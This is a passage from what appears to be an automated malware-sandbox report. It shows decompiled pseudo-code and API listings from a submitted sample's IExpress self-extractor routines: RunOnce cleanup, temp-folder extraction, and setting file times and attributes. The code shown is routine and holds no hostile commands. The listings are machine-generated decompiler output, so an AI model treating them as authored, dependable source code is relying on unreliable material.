                                                                                                                                                                                                                                            • LocalFree.KERNEL32(02EC8390,?,00000000), ref: 00A45305
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(02EC8390), ref: 00A4530C
                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNELBASE(00A411FC,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00A45363
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00A45334
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                            • API String ID: 2833751637-2312194364
                                                                                                                                                                                                                                            • Opcode ID: 317fd7bfce6a3e05abf32eab5a8038cedd96c90d82f65ac091dab409a2143d84
                                                                                                                                                                                                                                            • Instruction ID: e687417a7ca743933a02b1587c4ffc75fabe7e4d6ba4b7acd80248879a829bf0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 317fd7bfce6a3e05abf32eab5a8038cedd96c90d82f65ac091dab409a2143d84
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A721F33D900604DBCB70EFA4ED19B6A37B4BBD2784F040129E4425A6A1CFF66C86CB41
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A41FE1(void* __ecx) {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				long _t4;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				if( *0xa48530 != 0) {
                                                                                                                                                                                                                                            					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                                                                                                                                                                                            					if(_t4 == 0) {
                                                                                                                                                                                                                                            						RegDeleteValueA(_v8, "wextract_cleanup0"); // executed
                                                                                                                                                                                                                                            						return RegCloseKey(_v8);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t4;
                                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                                            0x00a41fee
                                                                                                                                                                                                                                            0x00a42005
                                                                                                                                                                                                                                            0x00a4200d
                                                                                                                                                                                                                                            0x00a42017
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a42020
                                                                                                                                                                                                                                            0x00a4200d
                                                                                                                                                                                                                                            0x00a42029

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,00A4538C,?,?,00A4538C), ref: 00A42005
                                                                                                                                                                                                                                            • RegDeleteValueA.KERNELBASE(00A4538C,wextract_cleanup0,?,?,00A4538C), ref: 00A42017
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00A4538C,?,?,00A4538C), ref: 00A42020
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                                                                                                                                                                                                                                            • API String ID: 849931509-702805525
                                                                                                                                                                                                                                            • Opcode ID: 14cdab8e366d3a8ea54cc515ed243b472bbf04b9d2f057c518879c52ab7a55c8
                                                                                                                                                                                                                                            • Instruction ID: 09b6a01cf85b3fbcb4fa035a178e3005a1c4458a8d1b3f12240345e03a8441c9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 14cdab8e366d3a8ea54cc515ed243b472bbf04b9d2f057c518879c52ab7a55c8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4E04F3C694318BBE721DBD0FC0AF5D7B69F7D1741F100194B905A0061EB665E15D716
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E00A44CD0(char* __edx, long _a4, int _a8) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t29;
                                                                                                                                                                                                                                            				int _t30;
                                                                                                                                                                                                                                            				long _t32;
                                                                                                                                                                                                                                            				signed int _t33;
                                                                                                                                                                                                                                            				long _t35;
                                                                                                                                                                                                                                            				long _t36;
                                                                                                                                                                                                                                            				struct HWND__* _t37;
                                                                                                                                                                                                                                            				long _t38;
                                                                                                                                                                                                                                            				long _t39;
                                                                                                                                                                                                                                            				long _t41;
                                                                                                                                                                                                                                            				long _t44;
                                                                                                                                                                                                                                            				long _t45;
                                                                                                                                                                                                                                            				long _t46;
                                                                                                                                                                                                                                            				signed int _t50;
                                                                                                                                                                                                                                            				long _t51;
                                                                                                                                                                                                                                            				char* _t58;
                                                                                                                                                                                                                                            				long _t59;
                                                                                                                                                                                                                                            				char* _t63;
                                                                                                                                                                                                                                            				long _t64;
                                                                                                                                                                                                                                            				CHAR* _t71;
                                                                                                                                                                                                                                            				CHAR* _t74;
                                                                                                                                                                                                                                            				int _t75;
                                                                                                                                                                                                                                            				signed int _t76;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t69 = __edx;
                                                                                                                                                                                                                                            				_t29 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            				_t30 = _t29 ^ _t76;
                                                                                                                                                                                                                                            				_v8 = _t30;
                                                                                                                                                                                                                                            				_t75 = _a8;
                                                                                                                                                                                                                                            				if( *0xa491d8 == 0) {
                                                                                                                                                                                                                                            					_t32 = _a4;
                                                                                                                                                                                                                                            					__eflags = _t32;
                                                                                                                                                                                                                                            					if(_t32 == 0) {
                                                                                                                                                                                                                                            						_t33 = E00A44E99(_t75);
                                                                                                                                                                                                                                            						L35:
                                                                                                                                                                                                                                            						return E00A46CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t35 = _t32 - 1;
                                                                                                                                                                                                                                            					__eflags = _t35;
                                                                                                                                                                                                                                            					if(_t35 == 0) {
                                                                                                                                                                                                                                            						L9:
                                                                                                                                                                                                                                            						_t33 = 0;
                                                                                                                                                                                                                                            						goto L35;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t36 = _t35 - 1;
                                                                                                                                                                                                                                            					__eflags = _t36;
                                                                                                                                                                                                                                            					if(_t36 == 0) {
                                                                                                                                                                                                                                            						_t37 =  *0xa48584; // 0x0
                                                                                                                                                                                                                                            						__eflags = _t37;
                                                                                                                                                                                                                                            						if(_t37 != 0) {
                                                                                                                                                                                                                                            							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t54 = 0xa491e4;
                                                                                                                                                                                                                                            						_t58 = 0xa491e4;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t38 =  *_t58;
                                                                                                                                                                                                                                            							_t58 =  &(_t58[1]);
                                                                                                                                                                                                                                            							__eflags = _t38;
                                                                                                                                                                                                                                            						} while (_t38 != 0);
                                                                                                                                                                                                                                            						_t59 = _t58 - 0xa491e5;
                                                                                                                                                                                                                                            						__eflags = _t59;
                                                                                                                                                                                                                                            						_t71 =  *(_t75 + 4);
                                                                                                                                                                                                                                            						_t73 =  &(_t71[1]);
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t39 =  *_t71;
                                                                                                                                                                                                                                            							_t71 =  &(_t71[1]);
                                                                                                                                                                                                                                            							__eflags = _t39;
                                                                                                                                                                                                                                            						} while (_t39 != 0);
                                                                                                                                                                                                                                            						_t69 = _t71 - _t73;
                                                                                                                                                                                                                                            						_t30 = _t59 + 1 + _t71 - _t73;
                                                                                                                                                                                                                                            						__eflags = _t30 - 0x104;
                                                                                                                                                                                                                                            						if(_t30 >= 0x104) {
                                                                                                                                                                                                                                            							L3:
                                                                                                                                                                                                                                            							_t33 = _t30 | 0xffffffff;
                                                                                                                                                                                                                                            							goto L35;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t69 = 0xa491e4;
                                                                                                                                                                                                                                            						_t30 = E00A44702( &_v268, 0xa491e4,  *(_t75 + 4));
                                                                                                                                                                                                                                            						__eflags = _t30;
                                                                                                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t41 = E00A4476D( &_v268, __eflags);
                                                                                                                                                                                                                                            						__eflags = _t41;
                                                                                                                                                                                                                                            						if(_t41 == 0) {
                                                                                                                                                                                                                                            							goto L9;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_push(0x180);
                                                                                                                                                                                                                                            						_t30 = E00A44980( &_v268, 0x8302); // executed
                                                                                                                                                                                                                                            						_t75 = _t30;
                                                                                                                                                                                                                                            						__eflags = _t75 - 0xffffffff;
                                                                                                                                                                                                                                            						if(_t75 == 0xffffffff) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t30 = E00A447E0( &_v268);
                                                                                                                                                                                                                                            						__eflags = _t30;
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *0xa493f4 =  *0xa493f4 + 1;
                                                                                                                                                                                                                                            						_t33 = _t75;
                                                                                                                                                                                                                                            						goto L35;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t44 = _t36 - 1;
                                                                                                                                                                                                                                            					__eflags = _t44;
                                                                                                                                                                                                                                            					if(_t44 == 0) {
                                                                                                                                                                                                                                            						_t54 = 0xa491e4;
                                                                                                                                                                                                                                            						_t63 = 0xa491e4;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t45 =  *_t63;
                                                                                                                                                                                                                                            							_t63 =  &(_t63[1]);
                                                                                                                                                                                                                                            							__eflags = _t45;
                                                                                                                                                                                                                                            						} while (_t45 != 0);
                                                                                                                                                                                                                                            						_t74 =  *(_t75 + 4);
                                                                                                                                                                                                                                            						_t64 = _t63 - 0xa491e5;
                                                                                                                                                                                                                                            						__eflags = _t64;
                                                                                                                                                                                                                                            						_t69 =  &(_t74[1]);
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t46 =  *_t74;
                                                                                                                                                                                                                                            							_t74 =  &(_t74[1]);
                                                                                                                                                                                                                                            							__eflags = _t46;
                                                                                                                                                                                                                                            						} while (_t46 != 0);
                                                                                                                                                                                                                                            						_t73 = _t74 - _t69;
                                                                                                                                                                                                                                            						_t30 = _t64 + 1 + _t74 - _t69;
                                                                                                                                                                                                                                            						__eflags = _t30 - 0x104;
                                                                                                                                                                                                                                            						if(_t30 >= 0x104) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t69 = 0xa491e4;
                                                                                                                                                                                                                                            						_t30 = E00A44702( &_v268, 0xa491e4,  *(_t75 + 4));
                                                                                                                                                                                                                                            						__eflags = _t30;
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                                                                                                                                                                                            						_t30 = E00A44C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                                                                                                                                                                                            						__eflags = _t30;
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						E00A44B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                                                                                                                                                                                            						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                                                                                                                                                                                            						__eflags = _t50;
                                                                                                                                                                                                                                            						if(_t50 != 0) {
                                                                                                                                                                                                                                            							_t51 = _t50 & 0x00000027;
                                                                                                                                                                                                                                            							__eflags = _t51;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t51 = 0x80;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                                                                                                                                                                                            						__eflags = _t30;
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t33 = 1;
                                                                                                                                                                                                                                            							goto L35;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t30 = _t44 - 1;
                                                                                                                                                                                                                                            					__eflags = _t30;
                                                                                                                                                                                                                                            					if(_t30 == 0) {
                                                                                                                                                                                                                                            						goto L3;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L9;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_a4 == 3) {
                                                                                                                                                                                                                                            					_t30 = E00A44B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				goto L3;
                                                                                                                                                                                                                                            			}































                                                                                                                                                                                                                                            0x00a44cd0
                                                                                                                                                                                                                                            0x00a44cdb
                                                                                                                                                                                                                                            0x00a44ce0
                                                                                                                                                                                                                                            0x00a44ce2
                                                                                                                                                                                                                                            0x00a44cee
                                                                                                                                                                                                                                            0x00a44cf2
                                                                                                                                                                                                                                            0x00a44d0e
                                                                                                                                                                                                                                            0x00a44d0e
                                                                                                                                                                                                                                            0x00a44d11
                                                                                                                                                                                                                                            0x00a44e83
                                                                                                                                                                                                                                            0x00a44e88
                                                                                                                                                                                                                                            0x00a44e98
                                                                                                                                                                                                                                            0x00a44e98
                                                                                                                                                                                                                                            0x00a44d17
                                                                                                                                                                                                                                            0x00a44d17
                                                                                                                                                                                                                                            0x00a44d1a
                                                                                                                                                                                                                                            0x00a44d2f
                                                                                                                                                                                                                                            0x00a44d2f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a44d2f
                                                                                                                                                                                                                                            0x00a44d1c
                                                                                                                                                                                                                                            0x00a44d1c
                                                                                                                                                                                                                                            0x00a44d1f
                                                                                                                                                                                                                                            0x00a44dcb
                                                                                                                                                                                                                                            0x00a44dd0
                                                                                                                                                                                                                                            0x00a44dd2
                                                                                                                                                                                                                                            0x00a44ddd
                                                                                                                                                                                                                                            0x00a44ddd
                                                                                                                                                                                                                                            0x00a44de3
                                                                                                                                                                                                                                            0x00a44de8
                                                                                                                                                                                                                                            0x00a44ded
                                                                                                                                                                                                                                            0x00a44ded
                                                                                                                                                                                                                                            0x00a44def
                                                                                                                                                                                                                                            0x00a44df0
                                                                                                                                                                                                                                            0x00a44df0
                                                                                                                                                                                                                                            0x00a44df4
                                                                                                                                                                                                                                            0x00a44df4
                                                                                                                                                                                                                                            0x00a44df6
                                                                                                                                                                                                                                            0x00a44df9
                                                                                                                                                                                                                                            0x00a44dfc
                                                                                                                                                                                                                                            0x00a44dfc
                                                                                                                                                                                                                                            0x00a44dfe
                                                                                                                                                                                                                                            0x00a44dff
                                                                                                                                                                                                                                            0x00a44dff
                                                                                                                                                                                                                                            0x00a44e03
                                                                                                                                                                                                                                            0x00a44e08
                                                                                                                                                                                                                                            0x00a44e0a
                                                                                                                                                                                                                                            0x00a44e0f
                                                                                                                                                                                                                                            0x00a44d03
                                                                                                                                                                                                                                            0x00a44d03
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a44d03
                                                                                                                                                                                                                                            0x00a44e18
                                                                                                                                                                                                                                            0x00a44e20
                                                                                                                                                                                                                                            0x00a44e25
                                                                                                                                                                                                                                            0x00a44e27
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a44e33
                                                                                                                                                                                                                                            0x00a44e38
                                                                                                                                                                                                                                            0x00a44e3a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a44e40
                                                                                                                                                                                                                                            0x00a44e51
                                                                                                                                                                                                                                            0x00a44e56
                                                                                                                                                                                                                                            0x00a44e5b
                                                                                                                                                                                                                                            0x00a44e5e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a44e6a
                                                                                                                                                                                                                                            0x00a44e6f
                                                                                                                                                                                                                                            0x00a44e71
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a44e77
                                                                                                                                                                                                                                            0x00a44e7d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a44e7d
                                                                                                                                                                                                                                            0x00a44d25
                                                                                                                                                                                                                                            0x00a44d25
                                                                                                                                                                                                                                            0x00a44d28
                                                                                                                                                                                                                                            0x00a44d36
                                                                                                                                                                                                                                            0x00a44d3b
                                                                                                                                                                                                                                            0x00a44d40
                                                                                                                                                                                                                                            0x00a44d40
                                                                                                                                                                                                                                            0x00a44d42
                                                                                                                                                                                                                                            0x00a44d43
                                                                                                                                                                                                                                            0x00a44d43
                                                                                                                                                                                                                                            0x00a44d47
                                                                                                                                                                                                                                            0x00a44d4a
                                                                                                                                                                                                                                            0x00a44d4a
                                                                                                                                                                                                                                            0x00a44d4c
                                                                                                                                                                                                                                            0x00a44d4f
                                                                                                                                                                                                                                            0x00a44d4f
                                                                                                                                                                                                                                            0x00a44d51
                                                                                                                                                                                                                                            0x00a44d52
                                                                                                                                                                                                                                            0x00a44d52
                                                                                                                                                                                                                                            0x00a44d56
                                                                                                                                                                                                                                            0x00a44d5b
                                                                                                                                                                                                                                            0x00a44d5d
                                                                                                                                                                                                                                            0x00a44d62
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a44d67
                                                                                                                                                                                                                                            0x00a44d6f
                                                                                                                                                                                                                                            0x00a44d74
                                                                                                                                                                                                                                            0x00a44d76
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a44d7c
                                                                                                                                                                                                                                            0x00a44d84
                                                                                                                                                                                                                                            0x00a44d89
                                                                                                                                                                                                                                            0x00a44d8b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a44d94
                                                                                                                                                                                                                                            0x00a44d99
                                                                                                                                                                                                                                            0x00a44d9e
                                                                                                                                                                                                                                            0x00a44da1
                                                                                                                                                                                                                                            0x00a44daa
                                                                                                                                                                                                                                            0x00a44daa
                                                                                                                                                                                                                                            0x00a44da3
                                                                                                                                                                                                                                            0x00a44da3
                                                                                                                                                                                                                                            0x00a44da3
                                                                                                                                                                                                                                            0x00a44db5
                                                                                                                                                                                                                                            0x00a44dbb
                                                                                                                                                                                                                                            0x00a44dbd
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a44dc3
                                                                                                                                                                                                                                            0x00a44dc5
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a44dc5
                                                                                                                                                                                                                                            0x00a44dbd
                                                                                                                                                                                                                                            0x00a44d2a
                                                                                                                                                                                                                                            0x00a44d2a
                                                                                                                                                                                                                                            0x00a44d2d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a44d2d
                                                                                                                                                                                                                                            0x00a44cf8
                                                                                                                                                                                                                                            0x00a44cfd
                                                                                                                                                                                                                                            0x00a44d02
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00A44DB5
                                                                                                                                                                                                                                            • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00A44DDD
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AttributesFileItemText
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                            • API String ID: 3625706803-2312194364
                                                                                                                                                                                                                                            • Opcode ID: 3c87f237eaaa6065cfca28d657f041df9747b202d00ef8b405f877b3e14aff33
                                                                                                                                                                                                                                            • Instruction ID: 8289bc8ae095f592c532f6224ce2f310b125ea1b62fa9122ca5ae9a8599da598
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3c87f237eaaa6065cfca28d657f041df9747b202d00ef8b405f877b3e14aff33
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B941053EA005019BCB259F38DD447F677A5EBCE304F144668D88697685DF32DE46C750
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A44C37(signed int __ecx, int __edx, int _a4) {
                                                                                                                                                                                                                                            				struct _FILETIME _v12;
                                                                                                                                                                                                                                            				struct _FILETIME _v20;
                                                                                                                                                                                                                                            				FILETIME* _t14;
                                                                                                                                                                                                                                            				int _t15;
                                                                                                                                                                                                                                            				signed int _t21;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t21 = __ecx * 0x18;
                                                                                                                                                                                                                                            				if( *((intOrPtr*)(_t21 + 0xa48d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t14 =  &_v12;
                                                                                                                                                                                                                                            					_t15 = SetFileTime( *(_t21 + 0xa48d74), _t14, _t14, _t14); // executed
                                                                                                                                                                                                                                            					if(_t15 == 0) {
                                                                                                                                                                                                                                            						goto L5;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                                            0x00a44c40
                                                                                                                                                                                                                                            0x00a44c4a
                                                                                                                                                                                                                                            0x00a44c8d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a44c70
                                                                                                                                                                                                                                            0x00a44c70
                                                                                                                                                                                                                                            0x00a44c7e
                                                                                                                                                                                                                                            0x00a44c86
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a44c8a

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • DosDateTimeToFileTime.KERNEL32 ref: 00A44C54
                                                                                                                                                                                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00A44C66
                                                                                                                                                                                                                                            • SetFileTime.KERNELBASE(?,?,?,?), ref: 00A44C7E
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Time$File$DateLocal
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2071732420-0
                                                                                                                                                                                                                                            • Opcode ID: 8197dec82b5c24fd4590fd7f95ca95057bef35acd54b6240e2ebff17ffb8b43a
                                                                                                                                                                                                                                            • Instruction ID: a446cac00959fd78aaff6487da647e2669c6a63416440a4d7382cc8d839206ab
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8197dec82b5c24fd4590fd7f95ca95057bef35acd54b6240e2ebff17ffb8b43a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CAF0907EA0120CAFAB64DFB4DC88EBB77ADEB99241B48052AA815C1050EA31D914C7A0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                                                                            			E00A4487A(CHAR* __ecx, signed int __edx) {
                                                                                                                                                                                                                                            				void* _t7;
                                                                                                                                                                                                                                            				CHAR* _t11;
                                                                                                                                                                                                                                            				long _t18;
                                                                                                                                                                                                                                            				long _t23;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t11 = __ecx;
                                                                                                                                                                                                                                            				asm("sbb edi, edi");
                                                                                                                                                                                                                                            				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                                                                                                                                                                                            				if((__edx & 0x00000100) == 0) {
                                                                                                                                                                                                                                            					asm("sbb esi, esi");
                                                                                                                                                                                                                                            					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					if((__edx & 0x00000400) == 0) {
                                                                                                                                                                                                                                            						asm("sbb esi, esi");
                                                                                                                                                                                                                                            						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t23 = 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                                                                                                                                                                                            				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                                                                                                                                                                                            					return _t7;
                                                                                                                                                                                                                                            				} else {
